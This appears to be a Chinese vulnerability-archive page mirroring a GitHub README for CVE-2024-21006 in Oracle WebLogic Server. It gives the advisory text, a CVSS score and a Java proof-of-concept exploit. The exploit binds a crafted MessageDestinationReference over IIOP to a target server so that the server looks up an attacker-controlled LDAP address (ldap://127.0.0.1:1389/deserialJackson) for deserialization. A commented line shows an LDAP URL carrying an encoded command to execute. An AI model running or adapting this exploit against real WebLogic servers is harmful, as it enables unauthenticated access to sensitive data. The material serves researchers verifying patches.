目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CVE-2024-21006 PoC — Oracle Fusion Middleware 的 Oracle WebLogic Server 安全漏洞

来源
https://github.com/momika233/CVE-2024-21006
关联漏洞
标题:Oracle Fusion Middleware 的 Oracle WebLogic Server 安全漏洞 (CVE-2024-21006)
Description:Oracle Fusion Middleware(Oracle融合中间件)和Oracle WebLogic Server都是美国甲骨文(Oracle)公司的产品。Oracle Fusion Middleware是一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 Oracle Fusion Middl
介绍
# CVE-2024-21006
### [CVE-2024-21006](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21006)
![](https://img.shields.io/static/v1?label=Product&message=WebLogic%20Server&color=blue)
![](https://img.shields.io/static/v1?label=Version&message=%3D%2012.2.1.4.0%20&color=brighgreen)
![](https://img.shields.io/static/v1?label=Vulnerability&message=Easily%20exploitable%20vulnerability%20allows%20unauthenticated%20attacker%20with%20network%20access%20via%20T3%2C%20IIOP%20to%20compromise%20Oracle%20WebLogic%20Server.%20%20Successful%20attacks%20of%20this%20vulnerability%20can%20result%20in%20%20unauthorized%20access%20to%20critical%20data%20or%20complete%20access%20to%20all%20Oracle%20WebLogic%20Server%20accessible%20data.&color=brighgreen)

### Description

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core).  Supported versions that are affected are 12.2.1.4.0 and  14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server.  Successful attacks of this vulnerability can result in  unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

### POC

```
package org.example;

import weblogic.j2ee.descriptor.InjectionTargetBean;
import weblogic.j2ee.descriptor.MessageDestinationRefBean;

import javax.naming.*;
import java.util.Hashtable;

public class MessageDestinationReference {

    public static void main(String[] args) throws Exception {
        String ip = "192.168.31.69";
        String port = "7001";
//        String rmiurl = "ldap://192.168.0.103/cVLtcNoHML/Plain/Exec/eyJjbWQiOiJ0b3VjaCAvdG1wL3N1Y2Nlc3MxMjMifQ==";
        String rhost = String.format("iiop://%s:%s", ip, port);

        Hashtable<String, String> env = new Hashtable<String, String>();
        // add wlsserver/server/lib/weblogic.jar to classpath,else will error.
        env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");
        env.put(Context.PROVIDER_URL, rhost);
        Context context = new InitialContext(env);
//        Reference reference = new Reference("weblogic.application.naming.MessageDestinationObjectFactory","weblogic.application.naming.MessageDestinationObjectFactory","");
        weblogic.application.naming.MessageDestinationReference messageDestinationReference=new weblogic.application.naming.MessageDestinationReference(null, new MessageDestinationRefBean() {
            @Override
            public String[] getDescriptions() {
                return new String[0];
            }

            @Override
            public void addDescription(String s) {

            }

            @Override
            public void removeDescription(String s) {

            }

            @Override
            public void setDescriptions(String[] strings) {

            }

            @Override
            public String getMessageDestinationRefName() {
                return null;
            }

            @Override
            public void setMessageDestinationRefName(String s) {

            }

            @Override
            public String getMessageDestinationType() {
                return "weblogic.application.naming.MessageDestinationReference";
            }

            @Override
            public void setMessageDestinationType(String s) {

            }

            @Override
            public String getMessageDestinationUsage() {
                return null;
            }

            @Override
            public void setMessageDestinationUsage(String s) {

            }

            @Override
            public String getMessageDestinationLink() {
                return null;
            }

            @Override
            public void setMessageDestinationLink(String s) {

            }

            @Override
            public String getMappedName() {
                return null;
            }

            @Override
            public void setMappedName(String s) {

            }

            @Override
            public InjectionTargetBean[] getInjectionTargets() {
                return new InjectionTargetBean[0];
            }

            @Override
            public InjectionTargetBean createInjectionTarget() {
                return null;
            }

            @Override
            public void destroyInjectionTarget(InjectionTargetBean injectionTargetBean) {

            }

            @Override
            public String getLookupName() {
                return null;
            }

            @Override
            public void setLookupName(String s) {

            }

            @Override
            public String getId() {
                return null;
            }

            @Override
            public void setId(String s) {

            }
        }, "ldap://127.0.0.1:1389/deserialJackson", null, null);

        context.bind("momika233",messageDestinationReference);
        context.lookup("momika233");
    }
}
```

#### Github
- [https://github.com/momika233/CVE-2024-21006](https://github.com/momika233/CVE-2024-21006)
文件快照

 [4.0K]  /data/pocs/63059e4e012c578f4c4bde3e86deb3f1a8c27934
└── [5.1K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →